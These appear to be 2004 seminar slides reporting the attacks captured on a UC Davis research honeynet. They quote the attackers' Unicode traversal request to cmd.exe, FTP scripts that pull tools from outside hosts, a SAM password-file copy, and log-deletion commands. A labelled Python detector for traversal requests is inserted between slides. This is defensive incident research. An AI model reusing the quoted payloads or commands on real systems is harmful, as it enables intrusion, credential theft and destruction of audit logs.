Title: UCD/Promia Honeynet Project, UC Davis Security Lab Seminar, April 28, 2004, Adam Carlson, email: ajcarlson AT ucdavis.edu
What is a honeypot/honeynet?
- No widely accepted definition
- Lance Spitzner defines a honeypot as "... an information system resource whose value lies in unauthorized or illicit use of that resource." [1]
- A honeynet is a type of honeypot designed for research.
  - 1) A honeynet is a network of multiple systems
  - 2) All of the systems are real
- [1] http://www.governmentsecurity.org/articles/HoneypotsDefinitionsandValueofHoneypots.php
Why is a honeynet useful?
- Not meant to be used
- Less traffic to inspect
- No privacy issues
- Can simulate a more complex network
- Proactive rather than reactive
- Tests incident response
Promia/UCD honeynet overview
- Currently 4 honeynet machines
  - HP-1: Red Hat 9.0 Workstation Install
  - HP-2: Red Hat 7.2 Server Install
  - HP-3: Windows 2000 Server
  - HP-4: Windows NT Server
- ...Connected via a sensor (HP-Sensor) running Red Hat 9.0
Configuration Specifics
- HP-1 Red Hat 9.0
  - Configuration
    - Workstation install
  - Services
    - SSH
    - Syslog
    - FTP
- HP-2 Red Hat 7.2
  - Configuration
    - Server install
  - Services
    - SSH
    - Telnet
    - Apache
    - mySQL
    - BIND
    - FTP
- HP-3 Windows 2000 Server
  - Configuration
    - Default install with Service Pack 1
  - Services
    - IIS 5.0 Webserver
    - IIS FTP Server
    - WinVNC Virtual Network Computing server
- HP-4 Windows NT Server
  - Configuration
    - Default install with Service Pack 4
  - Services
    - IIS 3.0 Webserver
    - IIS FTP Server
    - WinVNC Virtual Network Computing server
Data Capture Methods
- Windows
  - Comlog command line logging utility
  - Evtsys Event Log to Syslog utility
  - IIS logs
  - Tcpdump traffic
  - New Sebek for Windows
- Linux
  - Sebek Kernel Module
  - Remote syslog server
  - Tcpdump traffic
  - Tripwire
- Sensor Configuration
  - Red Hat 9.0
  - Snort 2.0 with Snort-inline patch
  - ACID (Analysis Console for Intrusion Databases) with mySQL
  - Bridge-utils for ethernet bridging
  - OpenSSH
Initial Results
- Brought online on June 19, 2003
- 3 initial honeypot machines began receiving probes within 40 minutes of being online
- Suffered chronic worm infestation which resulted in 300-400 megabyte tcpdump files
- Patched against worms and created a fast and easy method for restoring computers
What took you so long?
- First attack came on June 21 at 3:39 pm, about 76 hours after the honeynet was brought online.
- Directed at the Windows NT IIS web server using a directory traversal URL.
- Uploaded privilege escalation tool named ErunAs2X.exe, remote shell tool nc.exe, and Firedaemon.exe
- Worm infestation forced us to take down the system and reinstall the OS.
- Next attack was on July 3, 2003
- Directed at a vulnerability in the Windows 2000 WebDAV (Web-based Distributed Authoring and Versioning) component of the IIS Web server
- The intruders set up a rogue ftp server listening on port 2687 and used it to upload software and music files.
- Attempted to make changes to Windows that we have been unable to explain
Why is this intruder trying to update our system at 12:26 am?
...
dr-x------   1 root  root  258048 Jul  5 00:39 NtServicePackUninstall
dr-x------   1 root  root    4096 Jul  5 00:38 Installer
-r--------   1 root  root     607 Jul  5 00:26 Q815021.log
-r--------   1 root  root    1518 Jul  5 00:21 OEWABLog.txt
dr-x------   1 root  root    4096 Jul  2 20:37 Debug
...
Q815021.log:
Service Pack started with following command line:
CheckSystem: ServicePack version Mismatch
DoInstallation: CheckSystem Failed
0xf076: Setup has detected that the version of the Service Pack installed on your system is lower than what is necessary to apply this hotfix. At minimum, you must have Service Pack 2 installed.
Message displayed to the user: Setup has detected that the version of the Service Pack installed on your system is lower than what is necessary to apply this hotfix. At minimum, you must have Service Pack 2 installed.
User Input: OK
- Sometime on July 5th the system crashed and was unable to boot back into a functioning state.
- System taken offline and restored, but we did not correctly diagnose the attack vector
- Attackers able to compromise the system only 3 hours after it is brought back online
- Again set up an FTP server and uploaded software and music files
- Continued to compromise and use the machine until August 26th, when the WebDAV vulnerability was patched.
Who doesn't love anonymous ftp with write privileges?
- Anonymous connection made to the Windows NT FTP server on July 5th at 2:15 am
- Checks for write permission, then uploads a file named 1mbtest.ptf
- Removed anonymous write permissions before the attacker could return
Thanks Unicode!
- On July 19th at 11:17 pm our Windows NT server became the target of the next attack.
- The IIS server running on the honeynet machine was vulnerable to a directory traversal attack using the Unicode encoding system
- GET /scripts/..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
- The attacker lists the contents of all drives, then creates an ftp script file
  - open xxx.235.254.67
  - steve
  - jackson
  - binary
  - get lsass.exe
  - get serv-u.ini
  - get command.exe
  - get kill.exe
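As an added example (not code from the honeynet project or the original slides), here is a small Python detector for the double-encoded and overlong-Unicode traversal requests described above: it decodes a request path repeatedly, the way IIS did, and flags any path that climbs above the web root or reaches cmd.exe. The sample request lines are constructed; the first mirrors the request recorded on the honeynet.

```python
"""Detect IIS-style Unicode / double-URL-encoded directory traversal in HTTP
request lines. Added example for this write-up, not honeynet project code."""
import re
from urllib.parse import unquote

# Overlong UTF-8 forms that IIS decoded to '/' and '\' (the MS00-078 bug).
OVERLONG = {"%c0%af": "/", "%c1%9c": "\\", "%c1%1c": "\\"}
SHELL_RE = re.compile(r"cmd\.exe|system32", re.IGNORECASE)

def decode_path(raw, rounds=3):
    """Decode repeatedly (IIS double-decoded: %255c -> %5c -> '\\'), mapping
    overlong sequences first. Returns (decoded, number of rounds that changed)."""
    path, used = raw, 0
    for _ in range(rounds):
        step = path
        for seq, ch in OVERLONG.items():
            step = re.sub(re.escape(seq), lambda _m: ch, step, flags=re.I)
        step = unquote(step, errors="replace")
        if step == path:
            break
        path, used = step, used + 1
    return path, used

def escapes_webroot(path):
    """Any '..' that climbs above the request root is traversal, whatever encoding hid it."""
    depth = 0
    for seg in re.split(r"[\\/]+", path.split("?", 1)[0]):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False

def inspect_request(line):
    """Classify one 'METHOD path HTTP/x' line. Double encoding alone is only a
    hint: %2520 in a legitimate file name also needs two decode rounds."""
    parts = line.split()
    if len(parts) < 2:
        return {"flagged": False, "decoded": "", "rounds": 0, "reasons": []}
    decoded, rounds = decode_path(parts[1])
    traversal, shell = escapes_webroot(decoded), bool(SHELL_RE.search(decoded))
    reasons = (["traversal above web root"] if traversal else []) + \
              (["references cmd.exe/system32"] if shell else []) + \
              (["double URL encoding"] if rounds >= 2 else [])
    return {"flagged": traversal or shell, "decoded": decoded,
            "rounds": rounds, "reasons": reasons}

SAMPLE_REQUESTS = [  # constructed; the first is the form seen on the honeynet
    "GET /scripts/..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0",
    "GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /index.html HTTP/1.0",
    "GET /docs/report%2520final.pdf HTTP/1.0",
]
```

Run `inspect_request` over each line of an IIS log's request field; a hit with `rounds >= 2` is the double-decode variant that the first-pass canonicalisation check missed.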
- FTP server did not accept the username/password
- Eventually able to get a remote shell on port 99 using the uploaded nc.exe
- Attacker then downloads p.exe, httpodbc.dll, svchost.exe and serv-u.ini
- Starts Serv-U FTP daemon listening on port 1020 using svchost.exe and serv-u.ini
- Uploads more tools via FTP before looking around the filesystem
- Discovers hidden directory with our honeypot forensics tools
- Downloads all of the tools and then disconnects
- Came back briefly 2 times in the next week to check the directories they had created
- 2:20 am on July 29th: upload and install a Half-Life Counterstrike game server. Attempt to hide the directory and install the game server as a service.
- At 3:30 am the game server is up and running with the title Super Fast California Server. Numerous clients immediately start connecting to the server.
- System taken offline at 5:15 pm
HTTPS, more secure, right?
- Next attack came July 31st and was directed at the Red Hat Linux 7.2 OpenSSL module used by the Apache Web Server
- Began with a TCP connection to port 443
- Attacker then sent a bad HTTP request to port 80, resulting in a 400 Bad Request message in response
- A number of connections are made to port 443 that contain the exploit targeting the KEY_ARG vulnerability found in the installed version of OpenSSL
- Execute a privilege elevation exploit and begin downloading rootkit tools from a remote FTP server
- Install rk rootkit and hidden SSH server listening on port 1212
- Uploaded selena.tgz which contained a fast and simple port 443 scanner utility
- Attempted to scan several class B networks for machines with port 443 open.
- Many connections observed over the next few days
- Download and install psyBNC IRC place holder program
- System taken offline on August 5th to make an image of the hard drive. Machine would not reboot.
And now more fun with IIS
- Next attack targeted the Microsoft IIS Server WebDAV SEARCH overflow vulnerability
- Began with a series of Echo Ping requests being sent to the target at 11:56 pm on Sept. 8, 2003.
- This was followed by a SEARCH request that exploited a vulnerability in the IIS server WebDAV capabilities, resulting in a remote shell listening on port 1055
- Attacker creates an FTP script
  - open xxx.xxx.143.233
  - microsoft
  - microsoft
  - bin
  - get "ntoskrnl.exe" c:\winnt\system32\cache\ntoskrnl.exe
  - get "settingslol.jpg" c:\winnt\system32\cache\settingslol.jpg
  - get "iislog.exe" c:\winnt\system32\cache\iislog.exe
  - bye
- ntoskrnl.exe contains the Serv-U FTP daemon
- settingslol.jpg contains the Serv-U configuration file
- iislog.exe contains a program that will delete IIS logs and kill processes on a Windows machine
- Attacker installs the FTP server to listen on port 2687 and uploads more tools: AdmDll.dll, iislog.exe, nc.exe, and r_server.exe.
- Creates remote shell using nc.exe listening on port 1234
- Repeatedly attempts to add a new user to the system but is unsuccessful due to password policy.
- They then install the r_server.exe program as a service. r_server is the server component of the Remote Administrator (RA) utility (http://www.radmin.com/download/default.html)
- Make r_server connection from 12:13 am to 12:24 am
- Finally, after 15 minutes and over 40 username/password combinations, the attacker gives up on attempting to add an account.
- Instead adds the built-in IWAM_HP-3 account to the administrator group and disconnects.
Too bad our hard drives come from the bargain barn
- Connection is made to the Serv-U FTP server later that day at 11:09 am.
- Attacker immediately goes to his tools directory and deletes all of the uploaded files except for the FTP server.
- At 11:13 am a connection is made from a different IP address. The attacker uploads and starts an FTP script that will download 7 DivX encoded movies.
- After the download starts, the attacker disconnects.
- Unfortunately there was only enough free space for one of the movies before the hard drive became completely filled.
- The full hard disk degraded performance and the system was taken offline at 7:25 pm on September 9th.
- The movie files were deleted but the rogue FTP server was left installed. The system was put back online at 11:00 pm on September 15th.
- Attackers returned at 11:45 pm on September 16th with a connection to the ftp server.
- The attackers again uploaded a number of tools including nc.exe, r_server.exe, and iislog.exe.
- Two more connections are made at 3:35 am and 11:22 pm on September 17th
- Because no new activity was being recorded, the system was taken offline and patched against the WebDAV vulnerability.
You can always count on the classics
- The next attack targeted the wu-ftpd FTP server running on the Red Hat 7.2 machine
- An anonymous connection is made to the FTP server. A connection containing an exploit of the fb_realpath() off-by-one vulnerability is then made.
- The exploit creates a remote shell and the attackers quickly connect
- The intruders download and install the shkit v4 rootkit. The rootkit installs trojaned versions of ifconfig, ps, ls, netstat, find, top, lsof, slocate, dir, md5sum, syslogd, pstree and login. It also installs a covert SSH daemon listening on port 10.
- Attackers connect to the hidden SSH daemon and download the SucKIT v1.3b kernel-based rootkit and the psyBNC IRC bouncer program.
- Over the next two days the psyBNC IRC program is used heavily, but little other activity is observed.
- Decision was made to take the system offline because it looked as if it was going to be used for file distribution.
Saving the best for last
- Last intrusion began at 11:45 pm on January 18th
- Directed at the Windows NT MSADC component of IIS
- Attack began with a series of HTTP GET requests, attempting a directory traversal using the UNICODE encoding scheme (similar to the earlier attack).
- Attacker then did a port scan of ports 1-3000
- Connects to the anonymous FTP server and lists drive contents, then disconnects
- Attacker spends the next 20 minutes attacking IIS attempting to open a command shell
- At 12:19 am the attacker issued a POST request to the MSADC component of the IIS web server. The POST was successful, alerting the attacker that the MSADC component was installed.
- Attacker exploited the MSADC vulnerability and at 1:15 am issued a command that copied the password file C:\winnt\repair\sam._ to the public web server directory, where it was then downloaded.
- The attacker then set up a rogue ftp server on port 1020 and a remote shell on port 99.
- Connected to the rogue ftp server, and uploaded a file named httpdodbc.dll. This was really the iiscrack exploit written by digitaloffense.net.
- At 1:45 am the attacker used MSADC to create a text file with a list of all files on the system, which was then downloaded.
- At 1:47 am the attacker used MSADC to copy the original version of cmd.exe, named cm_.exe, to the IIS web directory.
- Then uploaded two programs, winamp and mIRC, as well as a third file meant to test the target computer's bandwidth.
- At 3:29 am on January 19th, almost four hours after the attack began, the intruder closed all connections, leaving only the rogue ftp server running.
- A new connection was made at 5:51 pm that same day. The intruder immediately used the ftp server to re-open the command shell on port 99.
- The attacker then uploaded a few more tools before attempting to launch a Denial of Service attack at 6:07 pm
- After a few unsuccessful attempts, the attacker launched the DoS, generating over 2.14 gigabytes of fragmented IP packets in under 3 minutes. This attack continued until 9:50 pm.
- An attacker returned at 2:03 am to the rogue ftp server and uploaded more files, including the Half-Life game server that we had seen in a previous intrusion.
- The attackers also entered the C:\winnt\help\tutor directory, which was used to keep the ComLog cmd.exe shell logs. They deleted only the log files that had recorded their actions.
- The attacker then installed the Half-Life server, rebooted the machine, and disconnected at 2:48 am.
- The next connection was made at 12:29 am on January 22nd. An intruder connected to the rogue ftp server and uploaded a number of mp3 music files to the IIS web server directory.
- Between January 23rd and January 25th a number of successful requests for the mp3 files were made from an array of IP addresses
- Little other activity is recorded until January 28th, when another connection was made and another Denial of Service attack was launched using the mIRC program.
- Decision was made to take the system offline January 29th.
Conclusions
- Yes, we will be attacked: 357,233 Snort alerts and counting
- Able to gain tcpdump files containing actual exploits
- Collected real attack tools that are being used in the wild.
- (We received a workable exploit for the Windows DCOM RPC vulnerability only a few months after the vulnerability surfaced)
- Leads to more questions
... why are they trying to install hardware drivers at 11:30 pm?
...
2003/07/07 21:30:00 284.2
Munged cmdline: msiinst.exe /delayrebootq
EXE name: C:\WINNT\System32\msiinst.tmp\msiinst.exe
The protected system file (C:\WINNT\System32\msi.dll) was successfully unprotected.
The protected system file (C:\WINNT\System32\msihnd.dll) was successfully unprotected.
The protected system file (C:\WINNT\System32\msimsg.dll) was successfully unprotected.
The protected system file (C:\WINNT\System32\msiexec.exe) was successfully unprotected.
2003/07/07 21:35:35 1332.23 Driver Install
Munged cmdline: C:\WINNT\system32\wzcsetup.exe /i /P
EXE name: C:\WINNT\system32\wzcsetup.exe
Searching for hardware ID(s): ms_ndisuio
Enumerating files: C:\WINNT\inf\*.inf
Found MS_NDISUIO in C:\WINNT\inf\ndisuio.inf; Device: NDIS Usermode I/O Protocol; Driver: NDIS Usermode I/O Protocol; Provider: Microsoft; Mfg: Microsoft; Section: Install
Decorated section name: Install
Selected driver installs from section Install in c:\winnt\inf\ndisuio.inf.
Changed class GUID of device to 4D36E975-E325-11CE-BFC1-08002BE10318.
Set selected driver.
2003/07/07 21:35:50 1332.86 Driver Install
Searching for hardware ID(s): ms_wzcsvc
Enumerating files: C:\WINNT\inf\*.inf
Found MS_WZCSVC in C:\WINNT\inf\netwzc.inf; Device: Wireless Configuration; Driver: Wireless Configuration; Provider: Microsoft; Mfg: Microsoft; Section: WZCSVC.ndi
Decorated section name: WZCSVC.ndi
Selected driver installs from section WZCSVC.ndi in c:\winnt\inf\netwzc.inf.
Changed class GUID of device to 4D36E974-E325-11CE-BFC1-08002BE10318.
Set selected driver.
2003/07/07 21:36:00 1484.625 Driver Install
Munged cmdline: e:\f7861adccd4ae\i386\update\update.exe
EXE name: e:\f7861adccd4ae\i386\update\update.exe
Searching for hardware ID(s): acpi\fixedbutton,fixedbutton
Found ACPI\FixedButton in C:\WINNT\INF\machine.inf; Device: ACPI Fixed Feature Button; Driver: ACPI Fixed Feature Button; Provider: Microsoft; Mfg: (Standard system devices); Section: NO_DRV
Decorated section name: NO_DRV
Which logging mechanisms will they go after?
TCP  hp-3:ftp   hp-sensor.ucdavis.edu:32822     ESTABLISHED
TCP  hp-3:http  xxx.w80-8.abo.wanadoo.fr:3938   ESTABLISHED
TCP  hp-3:http  xxx.cs.ucdavis.edu:16387        ESTABLISHED
TCP  hp-3:http  xxx.ipt.aol.com:4460            ESTABLISHED
TCP  hp-3:http  xxx.ipt.aol.com:1825            ESTABLISHED
TCP  hp-3:http  xxx.prodigy.net.mx:3201         ESTABLISHED
TCP  hp-3:http  xxx.ppp.tiscali.fr:4931         CLOSE_WAIT
TCP  hp-3:http  xxx.18.13.191:4598              ESTABLISHED
TCP  hp-3:http  xxx.18.86.78:4188               ESTABLISHED
TCP  hp-3:http  xxx.19.25.175:3023              ESTABLISHED
TCP  hp-3:http  xxx.71.179.160:4550             ESTABLISHED
TCP  hp-3:1168  hp-4.ucdavis.edu:netbios-ssn    ESTABLISHED
c:\WINNT\system32\spool\prtprocs\w32x86\prnt>  Sun Jul 20 01:16:48 2003  services stop evtsys
Sun Jul 20 01:16:50 2003  Service evtsys stopped.
Sun Jul 20 01:16:50 2003
...
c:\WINNT\system32\spool\prtprocs\w32x86\prnt>  Sun Jul 20 01:18:25 2003  rmdir c:\winnt\system32\logfiles /q /s
Sun Jul 20 01:18:25 2003
Sun Jul 20 01:18:25 2003
Future Work
- UCD/Promia Honeynet version 2
- Honeynet goes public
- More realism: create a fictitious UC Davis group
- Advertise our presence
- Develop honeynet tools
- Honeytokens
Thanks!
- Special thanks to Promia for making this happen
- Big thanks to Matt Bishop, Tom Ristenpart, and Jimmy Zhao for their constant support and help.
- Monumental thanks to Brennen Reynolds of Off-Piste Consulting, who was the original designer of this project (and my constant partner in crime).